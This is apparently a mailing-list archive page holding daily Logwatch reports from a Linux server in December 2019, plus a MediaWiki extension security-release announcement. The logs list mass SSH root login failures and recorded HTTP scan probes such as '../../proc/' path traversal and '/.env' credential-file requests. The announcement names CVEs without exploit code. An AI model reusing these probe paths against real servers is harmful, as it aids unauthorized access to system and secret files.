times 222.186.190.2: 12 times Illegal users from: undef: 26 times 24.229.156.211 (24.229.156.211.res-cmts.sm.ptd.net): 2 times 36.66.188.183: 1 time 51.68.230.54 (54.ip-51-68-230.eu): 1 time 51.254.51.182 (ip182.ip-51-254-51.eu): 1 time 69.158.207.141: 16 times 78.22.13.155 (78-22-13-155.access.telenet.be): 1 time 78.233.121.149 (1ny88-1-78-233-121-149.fbx.proxad.net): 1 time 80.82.64.214 (no-reverse-dns-configured.com): 3 times 80.211.9.57 (cloud-io.cloud): 1 time 82.165.35.17 (s17783852.onlinehome-server.info): 1 time 93.84.86.69 (static14.byfly.gomel.by): 1 time 96.56.82.194 (ool-603852c2.static.optonline.net): 1 time 112.111.13.253: 1 time 118.179.112.206: 1 time 130.61.89.191: 1 time 130.61.122.5: 1 time 131.221.168.102: 1 time 156.216.156.217 (host-156.216.217.156-static.tedata.net): 1 time 167.99.75.174: 1 time 176.40.255.156 (host-176-40-255-156.reverse.superonline.net): 1 time 179.108.126.114 (static-179-108-126-114.optitel.net.br): 1 time 185.66.49.191: 1 time 187.94.142.253 (187-94-142-253-ebtarm-cf-1.visaonet.com.br): 1 time 197.237.26.212 (197.237.26.212.wananchi.com): 1 time 213.194.139.0: 1 time 218.88.164.159 (159.164.88.218.broad.cd.sc.dynamic.163data.com.cn): 3 times **Unmatched Entries** Protocol major versions differ for 81.169.130.158: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-NmapNSE_1.0 : 1 time(s) fatal: Unable to negotiate a key exchange method [preauth] : 1 time(s) error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 2 time(s) Protocol major versions differ for 81.169.130.158: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3 vs. SSH-1.5-Nmap-SSH1-Hostkey : 1 time(s) fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 8 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Sat Dec 21 04:42:03 2019 Date Range Processed: yesterday ( 2019-Dec-20 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [156:157] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ A total of 1 sites probed the server 66.240.205.34 Requests with error response codes 400 Bad Request /: 2 Time(s) mstshash=Administr: 2 Time(s) null: 2 Time(s) /?0628182016134805143312: 1 Time(s) icap://icap-server.net/server?arg=87: 1 Time(s) 404 Not Found /robots.txt: 37 Time(s) /berlin/apple-touch-icon.png: 18 Time(s) /home/verein: 3 Time(s) /home/zapf: 3 Time(s) /wp-login.php: 3 Time(s) /protokolle/Protokoll_MV_FFM_21.11.2015.pdf: 2 Time(s) /__media__/js/netsoltrademark.php: 1 Time(s) /resolutionen/wise15/Transparenz_in_der_Dr ... sparenz_in_der_: 1 Time(s) /sites/default/file/2013_05_Stellungnahme_CHERanking.pdf: 1 Time(s) /verein/satzung/%7CSatzung: 1 Time(s) /xmlrpc.php: 1 Time(s) 500 Internal Server Error /: 130 Time(s) /HNAP1: 1 Time(s) /ajax: 1 Time(s) /app/provision/000000000000.cfg: 1 Time(s) /app/provision/?mac=00a2895806ec: 1 Time(s) /evox/about: 1 Time(s) /login/submit/only: 1 Time(s) /nmaplowercheck1576863746: 1 Time(s) /sdk: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.173.142): 54 Time(s) root (222.186.173.154): 41 Time(s) root (222.186.175.167): 36 Time(s) root (222.186.175.217): 36 Time(s) root (222.186.180.223): 35 Time(s) root (218.92.0.131): 30 Time(s) root (222.186.173.183): 30 Time(s) root (222.186.175.181): 30 Time(s) root (222.186.42.4): 30 Time(s) root (222.186.180.147): 25 Time(s) root (222.186.169.192): 24 Time(s) root (222.186.173.238): 24 Time(s) root (222.186.175.220): 24 Time(s) root (49.88.112.64): 24 Time(s) root (218.92.0.212): 23 Time(s) root (222.186.169.194): 23 Time(s) root (222.186.180.41): 23 Time(s) root (218.92.0.148): 20 Time(s) root (222.186.175.161): 19 Time(s) root (222.186.173.180): 18 Time(s) root (222.186.175.147): 18 Time(s) root (222.186.175.154): 18 Time(s) root (222.186.175.182): 18 Time(s) root (222.186.175.202): 18 Time(s) root (222.186.180.17): 18 Time(s) root (222.186.180.6): 18 Time(s) root (222.186.190.92): 18 Time(s) root (218.92.0.175): 17 Time(s) root (222.186.190.2): 17 Time(s) root (218.92.0.134): 12 Time(s) root (218.92.0.164): 12 Time(s) root (218.92.0.178): 12 Time(s) root (218.92.0.179): 12 Time(s) root (222.186.173.215): 12 Time(s) root (222.186.175.148): 12 Time(s) root (222.186.175.150): 12 Time(s) root (222.186.175.151): 12 Time(s) root (222.186.175.155): 12 Time(s) root (222.186.175.163): 12 Time(s) root (222.186.175.169): 12 Time(s) root (222.186.175.183): 12 Time(s) root (61.177.172.128): 12 Time(s) root (218.92.0.155): 11 Time(s) root (222.186.180.9): 11 Time(s) root (222.186.173.226): 9 Time(s) root (112.85.42.181): 6 Time(s) root (218.92.0.135): 6 Time(s) root (218.92.0.145): 6 Time(s) root (218.92.0.158): 6 Time(s) root (218.92.0.165): 6 Time(s) root (218.92.0.170): 6 Time(s) root (218.92.0.172): 6 Time(s) root (222.186.175.216): 6 Time(s) root (222.186.180.8): 6 Time(s) root (49.88.112.59): 6 Time(s) root (49.88.112.61): 6 Time(s) root (49.88.112.62): 6 Time(s) unknown (221.165.126.138): 6 Time(s) root (112.85.42.171): 5 Time(s) root (112.85.42.175): 5 Time(s) root (222.186.175.140): 5 Time(s) root (222.186.175.212): 5 Time(s) root (222.186.175.215): 5 Time(s) unknown (223.226.116.4): 2 Time(s) unknown (92.63.194.26): 2 Time(s) unknown (cpe-65-24-251-40.insight.res.rr.com): 2 Time(s) postgres (103.101.52.48): 1 Time(s) postgres (222.128.59.164): 1 Time(s) postgres (36.66.156.125): 1 Time(s) root (112.214.136.5): 1 Time(s) root (178.79.11.62): 1 Time(s) root (180.190.64.11): 1 Time(s) root (185.120.77.56): 1 Time(s) root (188.39.20.2): 1 Time(s) root (195.231.9.20): 1 Time(s) root (197.69.194.35.bc.googleusercontent.com): 1 Time(s) root (218.92.0.141): 1 Time(s) root (27.50.24.83): 1 Time(s) root (53.red-80-28-238.staticip.rima-tde.net): 1 Time(s) root (bcdd2abd.skybroadband.com): 1 Time(s) root (ip33.ip-198-50-159.net): 1 Time(s) root (lfbn-idf1-1-1632-112.w90-90.abo.wanadoo.fr): 1 Time(s) root (static-52-252-24-46.ipcom.comunitel.net): 1 Time(s) root (static-70-145-62-95.ipcom.comunitel.net): 1 Time(s) unknown (103.91.181.25): 1 Time(s) unknown (104.236.246.16): 1 Time(s) unknown (110.164.76.61): 1 Time(s) unknown (111.95.5.23): 1 Time(s) unknown (116.72.16.15): 1 Time(s) unknown (119.205.235.251): 1 Time(s) unknown (120.132.124.237): 1 Time(s) unknown (121.69.40.250): 1 Time(s) unknown (123.21.67.84): 1 Time(s) unknown (132.145.18.157): 1 Time(s) unknown (139.59.78.236): 1 Time(s) unknown (14.173.131.138): 1 Time(s) unknown (159.203.77.51): 1 Time(s) unknown (159.65.144.233): 1 Time(s) unknown (180.245.146.38): 1 Time(s) unknown (182.185.223.185): 1 Time(s) unknown (185.120.77.56): 1 Time(s) unknown (188.166.237.191): 1 Time(s) unknown (194-118-206-6.hdsl.highway.telekom.at): 1 Time(s) unknown (200.173.187.35.bc.googleusercontent.com): 1 Time(s) unknown (206.189.137.113): 1 Time(s) unknown (223.29.200.70): 1 Time(s) unknown (37.139.13.105): 1 Time(s) unknown (40.124.4.131): 1 Time(s) unknown (46.101.27.6): 1 Time(s) unknown (49.49.244.149): 1 Time(s) unknown (5.11.37.63): 1 Time(s) unknown (58.22.99.135): 1 Time(s) unknown (91.205.217.22): 1 Time(s) unknown (95.189.104.67): 1 Time(s) unknown (host133.200-117-239.telecom.net.ar): 1 Time(s) unknown (ip-132-148-129-180.ip.secureserver.net): 1 Time(s) unknown (ip-176-199-132-109.hsi06.unitymediagroup.de): 1 Time(s) unknown (ip-206-57.sn1.clouditalia.com): 1 Time(s) unknown (mail6.keltron.in): 1 Time(s) unknown (mx-ll-183.89.237-49.dynamic.3bb.co.th): 1 Time(s) unknown (nilsriecker.de): 1 Time(s) unknown (ns301667.ip-94-23-50.eu): 1 Time(s) unknown (ns3045583.ip-46-105-122.eu): 1 Time(s) unknown (ool-8e366592.static.optonline.net): 1 Time(s) unknown (ppp91-122-191-82.pppoe.avangarddsl.ru): 1 Time(s) unknown (v133-130-109-118.a038.g.tyo1.static.cnode.io): 1 Time(s) Invalid Users: Unknown Account: 54 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 6 Miscellaneous warnings 13.751K Bytes accepted 14,081 13.751K Bytes sent via SMTP 14,081 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 2 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 2 Total 4xx Rejects 100.00% ======== ================================================== 101 Connections 44 Connections lost (inbound) 101 Disconnections 1 Removed from queue 1 Sent via SMTP 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- rsyslogd Begin ------------------------ **** Unmatched entries **** [origin software="rsyslogd" swVersion="8.4.2" x-pid="243" x-info="http://www.rsyslog.com"] exiting on signal 15. : 1 Times ---------------------- rsyslogd End ------------------------- --------------------- Connections (secure-log) Begin ------------------------ **Unmatched Entries** systemd-logind: New seat seat0.: 1 Time(s) ---------------------- Connections (secure-log) End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ SSHD Started: 2 Time(s) Disconnecting after too many authentication failures for user: invalid : 1 Time(s) root : 170 Time(s) Failed logins from: 27.50.24.83 (ip-27-50-24-83.cepat.net.id): 1 time 35.194.69.197 (197.69.194.35.bc.googleusercontent.com): 1 time 36.66.156.125: 1 time 46.24.252.52 (static-52-252-24-46.ipcom.comunitel.net): 1 time 49.88.112.59: 6 times 49.88.112.61: 6 times 49.88.112.62: 6 times 49.88.112.64: 24 times 61.177.172.128: 12 times 80.28.238.53 (53.red-80-28-238.staticip.rima-tde.net): 1 time 90.90.7.112 (lfbn-idf1-1-1632-112.w90-90.abo.wanadoo.fr): 1 time 95.62.145.70 (static-70-145-62-95.ipcom.comunitel.net): 1 time 103.101.52.48 (48.52.101.103.in-addr.arpa.semarangkota.go.id): 1 time 112.85.42.171: 5 times 112.85.42.175: 6 times 112.85.42.181: 6 times 112.214.136.5: 1 time 178.79.11.62 (11-62-dynamic.kti.rs): 1 time 180.190.64.11: 1 time 185.120.77.56: 1 time 188.39.20.2 (gateway.britishfriendly.com): 1 time 188.221.42.189 (bcdd2abd.skybroadband.com): 1 time 195.231.9.20 (host20-9-231-195.serverdedicati.aruba.it): 1 time 198.50.159.33 (ip33.ip-198-50-159.net): 1 time 218.92.0.131: 30 times 218.92.0.134: 12 times 218.92.0.135: 6 times 218.92.0.141: 4 times 218.92.0.145: 6 times 218.92.0.148: 20 times 218.92.0.155: 11 times 218.92.0.158: 6 times 218.92.0.164: 12 times 218.92.0.165: 6 times 218.92.0.170: 6 times 218.92.0.172: 6 times 218.92.0.175: 17 times 218.92.0.178: 12 times 218.92.0.179: 12 times 218.92.0.212: 23 times 222.128.59.164: 1 time 222.186.42.4: 30 times 222.186.169.192: 24 times 222.186.169.194: 23 times 222.186.173.142: 54 times 222.186.173.154: 41 times 222.186.173.180: 18 times 222.186.173.183: 30 times 222.186.173.215: 12 times 222.186.173.226: 12 times 222.186.173.238: 24 times 222.186.175.140: 5 times 222.186.175.147: 18 times 222.186.175.148: 12 times 222.186.175.150: 12 times 222.186.175.151: 12 times 222.186.175.154: 18 times 222.186.175.155: 12 times 222.186.175.161: 19 times 222.186.175.163: 12 times 222.186.175.167: 36 times 222.186.175.169: 12 times 222.186.175.181: 30 times 222.186.175.182: 18 times 222.186.175.183: 12 times 222.186.175.202: 18 times 222.186.175.212: 5 times 222.186.175.215: 5 times 222.186.175.216: 6 times 222.186.175.217: 36 times 222.186.175.220: 24 times 222.186.180.6: 18 times 222.186.180.8: 6 times 222.186.180.9: 11 times 222.186.180.17: 18 times 222.186.180.41: 23 times 222.186.180.147: 27 times 222.186.180.223: 35 times 222.186.190.2: 17 times 222.186.190.92: 18 times Illegal users from: undef: 18 times 5.11.37.63: 1 time 14.173.131.138 (static.vnpt.vn): 1 time 35.187.173.200 (200.173.187.35.bc.googleusercontent.com): 1 time 37.139.13.105: 1 time 40.124.4.131: 1 time 46.101.27.6 (wetech.digital.demo): 1 time 46.105.122.62 (ns3045583.ip-46-105-122.eu): 1 time 49.49.244.149 (mx-ll-49.49.244-149.dynamic.3bb.co.th): 1 time 58.22.99.135: 1 time 62.94.206.57 (ip-206-57.sn1.clouditalia.com): 1 time 65.24.251.40 (cpe-65-24-251-40.insight.res.rr.com): 2 times 91.122.191.82 (ppp91-122-191-82.pppoe.avangarddsl.ru): 1 time 91.205.217.22: 1 time 92.63.194.26: 2 times 94.23.50.194 (ns301667.ip-94-23-50.eu): 1 time 95.189.104.67 (xn--80apagqjddln9b0ga.xn--p1ai.104.189.95.in-addr.arpa): 1 time 103.10.168.8 (mail6.keltron.in): 1 time 103.91.181.25: 1 time 104.236.246.16: 1 time 110.164.76.61 (mx-ll-110-164-76-61.static.3bb.co.th): 1 time 111.95.5.23 (fm-dyn-111-95-5-23.fast.net.id): 1 time 116.72.16.15: 1 time 119.205.235.251: 1 time 120.132.124.237: 1 time 121.69.40.250: 1 time 123.21.67.84: 1 time 132.145.18.157: 1 time 132.148.129.180 (ip-132-148-129-180.ip.secureserver.net): 1 time 133.130.109.118 (v133-130-109-118.a038.g.tyo1.static.cnode.io): 1 time 139.59.78.236: 1 time 142.54.101.146 (ool-8e366592.static.optonline.net): 1 time 159.65.144.233: 1 time 159.203.77.51: 1 time 165.227.151.59 (nilsriecker.de): 1 time 176.199.132.109 (ip-176-199-132-109.hsi06.unitymediagroup.de): 1 time 180.245.146.38: 1 time 182.185.223.185: 1 time 183.89.237.49 (mx-ll-183.89.237-49.dynamic.3bb.co.th): 1 time 185.120.77.56: 1 time 188.166.237.191: 1 time 194.118.206.6 (194-118-206-6.hdsl.highway.telekom.at): 1 time 200.117.239.133 (host133.200-117-239.telecom.net.ar): 1 time 206.189.137.113: 1 time 221.165.126.138: 6 times 223.29.200.70 (Kol-223.29.200.70.PMPL-Broadband.net): 1 time 223.226.116.4: 2 times **Unmatched Entries** error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s) fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 4 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 10 Monate

1
0
0 / 0

Logwatch for h2361197.stratoserver.net (Linux)

by root＠zapf.in

################### Logwatch 7.4.0 (03/01/11) #################### Processing Initiated: Fri Dec 20 04:42:03 2019 Date Range Processed: yesterday ( 2019-Dec-19 ) Period is day. Detail Level of Output: 0 Type of Output/Format: mail / text Logfiles for Host: h2361197.stratoserver.net ################################################################## --------------------- fail2ban-messages Begin ------------------------ Banned services with Fail2Ban: Bans:Unbans ssh: [155:156] ---------------------- fail2ban-messages End ------------------------- --------------------- httpd Begin ------------------------ Requests with error response codes 400 Bad Request ../../: 2 Time(s) mstshash=Administr: 2 Time(s) ../../proc/: 1 Time(s) /w00tw00t.at.ISC.SANS.DFind:): 1 Time(s) 7: 1 Time(s) G?\xC7)J\x08\xB5+^9\x16j: 1 Time(s) 403 Forbidden /resolutionen/: 1 Time(s) 404 Not Found /robots.txt: 58 Time(s) /berlin/apple-touch-icon.png: 6 Time(s) /home/verein: 1 Time(s) /plus/search.php?q=www.ymwears.cn: 1 Time(s) /reader/2017_SoSe_Berlin_vorlaeufig.pdf: 1 Time(s) /resolutionen/wise12/Reso_WiSe12_Zivilgesellschaftliches: 1 Time(s) /search/?query=www.ymwears.cn: 1 Time(s) /search?q=www.ymwears.cn: 1 Time(s) /sites/default/files/Empfehlungen_der_ZaPF ... 7CStellungnahme: 1 Time(s) /wp-login.php: 1 Time(s) 500 Internal Server Error /: 26 Time(s) /.env: 1 Time(s) /ajax: 1 Time(s) /api/v1/pods: 1 Time(s) /cart/: 1 Time(s) /catalog/: 1 Time(s) /shop/: 1 Time(s) /store/: 1 Time(s) ---------------------- httpd End ------------------------- --------------------- pam_unix Begin ------------------------ sshd: Authentication Failures: root (222.186.169.192): 47 Time(s) root (222.186.175.216): 47 Time(s) root (222.186.42.4): 36 Time(s) root (222.186.175.148): 30 Time(s) root (222.186.180.147): 30 Time(s) root (222.186.180.9): 30 Time(s) root (49.88.112.59): 30 Time(s) root (218.92.0.165): 24 Time(s) root (222.186.175.147): 24 Time(s) root (222.186.175.161): 24 Time(s) root (222.186.175.182): 24 Time(s) root (222.186.175.217): 24 Time(s) root (222.186.175.220): 24 Time(s) root (222.186.173.183): 23 Time(s) root (222.186.175.140): 23 Time(s) root (218.92.0.131): 22 Time(s) root (222.186.173.142): 22 Time(s) root (222.186.175.169): 22 Time(s) root (222.186.175.167): 21 Time(s) root (218.92.0.145): 20 Time(s) root (218.92.0.212): 18 Time(s) root (222.186.173.154): 18 Time(s) root (222.186.175.155): 18 Time(s) root (222.186.175.212): 18 Time(s) root (222.186.180.17): 18 Time(s) root (222.186.180.41): 18 Time(s) unknown (31.184.218.90): 15 Time(s) root (112.85.42.174): 12 Time(s) root (218.92.0.175): 12 Time(s) root (222.186.173.180): 12 Time(s) root (222.186.173.238): 12 Time(s) root (222.186.175.151): 12 Time(s) root (222.186.175.154): 12 Time(s) root (222.186.175.163): 12 Time(s) root (222.186.175.181): 12 Time(s) root (222.186.175.183): 12 Time(s) root (222.186.175.202): 12 Time(s) root (222.186.180.223): 12 Time(s) root (222.186.180.6): 12 Time(s) root (222.186.180.8): 12 Time(s) root (222.186.190.92): 12 Time(s) root (112.85.42.173): 11 Time(s) root (112.85.42.178): 11 Time(s) root (218.92.0.179): 11 Time(s) root (222.186.173.226): 11 Time(s) root (222.186.175.215): 11 Time(s) root (49.88.112.62): 10 Time(s) root (218.92.0.148): 7 Time(s) root (112.85.42.172): 6 Time(s) root (218.92.0.135): 6 Time(s) root (218.92.0.164): 6 Time(s) root (218.92.0.170): 6 Time(s) root (222.186.169.194): 6 Time(s) root (222.186.173.215): 6 Time(s) root (222.186.190.2): 6 Time(s) root (49.88.112.55): 6 Time(s) root (49.88.112.61): 6 Time(s) root (49.88.112.64): 6 Time(s) root (112.85.42.171): 5 Time(s) root (112.85.42.176): 5 Time(s) root (112.85.42.181): 5 Time(s) root (218.92.0.134): 5 Time(s) root (218.92.0.155): 5 Time(s) root (218.92.0.178): 5 Time(s) root (222.186.175.150): 3 Time(s) unknown (dynamic-adsl-84-221-173-74.clienti.tiscali.it): 2 Time(s) postgres (188.120.239.34): 1 Time(s) postgres (255.red-2-139-215.staticip.rima-tde.net): 1 Time(s) postgres (31.184.218.90): 1 Time(s) postgres (45.55.157.147): 1 Time(s) root (103.5.127.97): 1 Time(s) root (112.175.232.155): 1 Time(s) root (171.78.177.89): 1 Time(s) root (173.ip-51-91-102.eu): 1 Time(s) root (180.190.64.253): 1 Time(s) root (189.103.85.27): 1 Time(s) root (207.154.232.160): 1 Time(s) root (223.197.175.171): 1 Time(s) root (31.184.218.90): 1 Time(s) root (36.66.149.211): 1 Time(s) root (47.244.169.183): 1 Time(s) root (89.189.154.66.dynamic.ufanet.ru): 1 Time(s) unknown (104.236.131.54): 1 Time(s) unknown (104.236.81.204): 1 Time(s) unknown (113.161.71.73): 1 Time(s) unknown (123.17.221.196): 1 Time(s) unknown (123.21.199.148): 1 Time(s) unknown (128.199.133.249): 1 Time(s) unknown (14.225.3.47): 1 Time(s) unknown (159.89.165.127): 1 Time(s) unknown (177.67.83.139): 1 Time(s) unknown (178.79.7.4): 1 Time(s) unknown (180.246.25.68): 1 Time(s) unknown (183.82.0.15): 1 Time(s) unknown (186.112.214.158): 1 Time(s) unknown (189.108.40.2): 1 Time(s) unknown (190.246.45.81): 1 Time(s) unknown (195.39.140.129): 1 Time(s) unknown (206.189.166.172): 1 Time(s) unknown (210.212.249.228): 1 Time(s) unknown (211.219.80.99): 1 Time(s) unknown (218.146.168.239): 1 Time(s) unknown (221.160.100.14): 1 Time(s) unknown (45.55.12.248): 1 Time(s) unknown (45.55.42.17): 1 Time(s) unknown (49.244.20.114): 1 Time(s) unknown (5751a94a.skybroadband.com): 1 Time(s) unknown (94.228.27.247): 1 Time(s) unknown (aob6.internetdsl.tpnet.pl): 1 Time(s) unknown (c-76-105-96-161.hsd1.ga.comcast.net): 1 Time(s) unknown (ip170.ip-5-196-110.eu): 1 Time(s) unknown (ns388423.ip-176-31-253.eu): 1 Time(s) unknown (post.pramo.ru): 1 Time(s) unknown (ppp-94-65-111-17.home.otenet.gr): 1 Time(s) Invalid Users: Unknown Account: 49 Time(s) ---------------------- pam_unix End ------------------------- --------------------- Postfix Begin ------------------------ 1 Miscellaneous warnings 13.491K Bytes accepted 13,815 13.491K Bytes sent via SMTP 13,815 ======== ================================================== 1 Accepted 100.00% -------- -------------------------------------------------- 1 Total 100.00% ======== ================================================== 294 4xx Reject relay denied 100.00% -------- -------------------------------------------------- 294 Total 4xx Rejects 100.00% ======== ================================================== 420 Connections 305 Connections lost (inbound) 420 Disconnections 1 Removed from queue 1 Sent via SMTP 2 Hostname verification errors (FCRDNS) ---------------------- Postfix End ------------------------- --------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------ Large Mailbox threshold: 40MB (41943040 bytes) Warning: Large mailbox: mailman.gz (1747199807) Warning: Large mailbox: mailman (235703599967) ---------------------- sendmail-largeboxes (large mail spool files) End ------------------------- --------------------- SSHD Begin ------------------------ Disconnecting after too many authentication failures for user: root : 165 Time(s) Failed logins from: 2.139.215.255 (255.red-2-139-215.staticip.rima-tde.net): 1 time 31.184.218.90: 2 times 36.66.149.211: 1 time 45.55.157.147: 1 time 47.244.169.183: 1 time 49.88.112.55: 6 times 49.88.112.59: 30 times 49.88.112.61: 6 times 49.88.112.62: 12 times 49.88.112.64: 6 times 51.91.102.173 (173.ip-51-91-102.eu): 1 time 89.189.154.66 (89.189.154.66.dynamic.ufanet.ru): 1 time 103.5.127.97: 1 time 112.85.42.171: 5 times 112.85.42.172: 6 times 112.85.42.173: 11 times 112.85.42.174: 12 times 112.85.42.176: 5 times 112.85.42.178: 11 times 112.85.42.181: 5 times 112.175.232.155: 1 time 171.78.177.89 (abts-tn-dynamic-89.177.78.171.airtelbroadband.in): 1 time 180.190.64.253: 1 time 188.120.239.34 (fanam-cinema.fvds.ru): 1 time 189.103.85.27 (bd67551b.virtua.com.br): 1 time 207.154.232.160: 1 time 218.92.0.131: 22 times 218.92.0.134: 5 times 218.92.0.135: 6 times 218.92.0.145: 24 times 218.92.0.148: 7 times 218.92.0.155: 5 times 218.92.0.164: 6 times 218.92.0.165: 24 times 218.92.0.170: 6 times 218.92.0.175: 12 times 218.92.0.178: 5 times 218.92.0.179: 11 times 218.92.0.212: 18 times 222.186.42.4: 36 times 222.186.169.192: 47 times 222.186.169.194: 6 times 222.186.173.142: 24 times 222.186.173.154: 18 times 222.186.173.180: 12 times 222.186.173.183: 23 times 222.186.173.215: 6 times 222.186.173.226: 11 times 222.186.173.238: 12 times 222.186.175.140: 23 times 222.186.175.147: 24 times 222.186.175.148: 30 times 222.186.175.150: 6 times 222.186.175.151: 12 times 222.186.175.154: 12 times 222.186.175.155: 18 times 222.186.175.161: 24 times 222.186.175.163: 12 times 222.186.175.167: 23 times 222.186.175.169: 22 times 222.186.175.181: 12 times 222.186.175.182: 24 times 222.186.175.183: 12 times 222.186.175.202: 12 times 222.186.175.212: 18 times 222.186.175.215: 11 times 222.186.175.216: 47 times 222.186.175.217: 24 times 222.186.175.220: 24 times 222.186.180.6: 12 times 222.186.180.8: 12 times 222.186.180.9: 30 times 222.186.180.17: 18 times 222.186.180.41: 18 times 222.186.180.147: 30 times 222.186.180.223: 12 times 222.186.190.2: 6 times 222.186.190.92: 12 times 223.197.175.171 (223-197-175-171.static.imsbiz.com): 1 time Illegal users from: undef: 25 times 5.196.110.170 (ip170.ip-5-196-110.eu): 1 time 14.225.3.47: 1 time 31.184.218.90: 15 times 45.55.12.248 (hostmaster.vitalconnectionuniversity.com): 1 time 45.55.42.17: 1 time 49.244.20.114 (114-adsl.ntc.net.np): 1 time 76.105.96.161 (c-76-105-96-161.hsd1.ga.comcast.net): 1 time 83.17.109.6 (aob6.internetdsl.tpnet.pl): 1 time 84.221.173.74 (dynamic-adsl-84-221-173-74.clienti.tiscali.it): 2 times 87.81.169.74 (5751a94a.skybroadband.com): 1 time 91.242.161.167 (post.pramo.ru): 1 time 94.65.111.17 (ppp-94-65-111-17.home.otenet.gr): 1 time 94.228.27.247 (94.228.27.247): 1 time 104.236.81.204: 1 time 104.236.131.54: 1 time 113.161.71.73 (static.vnpt.vn): 1 time 123.17.221.196 (static.vnpt.vn): 1 time 123.21.199.148: 1 time 128.199.133.249 (152717.cloudwaysapps.com): 1 time 159.89.165.127: 1 time 176.31.253.204 (ns388423.ip-176-31-253.eu): 1 time 177.67.83.139: 1 time 178.79.7.4: 1 time 180.246.25.68: 1 time 183.82.0.15 (broadband.actcorp.in): 1 time 186.112.214.158: 1 time 189.108.40.2 (189-108-40-2.customer.tdatabrasil.net.br): 1 time 190.246.45.81 (81-45-246-190.fibertel.com.ar): 1 time 195.39.140.129: 1 time 206.189.166.172: 1 time 210.212.249.228: 1 time 211.219.80.99: 1 time 218.146.168.239 (wymm91.com): 1 time 221.160.100.14: 1 time **Unmatched Entries** error: Received disconnect from 141.98.10.39: 2: Handshake failed [preauth] : 1 time(s) fatal: no matching cipher found: client aes256-cbc,rijndael-cbc(a)lysator.liu.se,aes192-cbc,aes128-cbc,arcfour128,arcfour,3des-cbc,none server aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com [preauth] : 6 time(s) ---------------------- SSHD End ------------------------- --------------------- Disk Space Begin ------------------------ Filesystem Size Used Avail Use% Mounted on /dev/vzfs 400G 241G 160G 61% / ---------------------- Disk Space End ------------------------- ###################### Logwatch End #########################

5 Jahre, 10 Monate

1
0
0 / 0

[MediaWiki-announce] MediaWiki Extensions and Skins Security Release Supplement

by Scott Bassett

Greetings- With the security/maintenance release of MediaWiki 1.31.6/1.32.6/1.33.2 [0], we would also like to provide this supplementary announcement of MediaWiki extensions and skins with now-public Phabricator tasks, security patches and backports [1]: == CheckUser == + (T234862, CVE-2019-18611) - Do not show oversighted edit summaries in CheckUser API <https://gerrit.wikimedia.org/r/q/Ie0aa0df2b3f03d8b910733f1b5e600a0dc978765> == AbuseFilter == + (T104807, CVE-2019-18612) - Older hidden versions of a currently-public AbuseFilter are exposed via diffs <https://gerrit.wikimedia.org/r/q/Ie23e8234ae550273bf3f6f9c5ac45b7fc54eec2a> + (T237887, CVE-2019-18987) - Old public versions of private filters are publicly viewable <https://gerrit.wikimedia.org/r/q/Ic12790bd33982473f77551bde9599ed083a3e1f1> == VisualEditor == + (T239209, CVE-2019-19708) - XSS in Visual Editor via Copy&Paste <https://gerrit.wikimedia.org/r/q/I1f99458fd2c4f6b2460dfe7a93b330ddee4400b6> == MinervaNeue skin == + (T240487, CVE requested) - XSS in MinervaNeue skin <https://gerrit.wikimedia.org/r/q/Ida471291f1698387a26736931ab17e6899e05b51> == LDAPAuthentication2 == + (T240338, No CVE requested) - LDAPAuthentication2 allows login with invalid password <https://gerrit.wikimedia.org/r/q/I7b125ab468ebc914b8a1c67ed0c03e3c2a20c6cd> The Wikimedia Security Team recommends updating these extensions and skins to the current master branch or relevant, supported release branch [2] as soon as possible. Some of the referenced Phabricator tasks above _may_ still be private. Unfortunately, when security issues are reported, sometimes sensitive information is exposed and since Phabricator is historical, we cannot make these tasks public without exposing this sensitive information. If you have any additional questions or concerns regarding this update, please feel free to contact security(a)wikimedia.org or file a security task within Phabricator [3]. [0] https://lists.wikimedia.org/pipermail/wikitech-l/2019-December/092886.html [1] https://phabricator.wikimedia.org/T234983 [2] https://www.mediawiki.org/wiki/Version_lifecycle [3] https://www.mediawiki.org/wiki/Reporting_security_bugs -- Scott Bassett sbassett(a)wikimedia.org _______________________________________________ 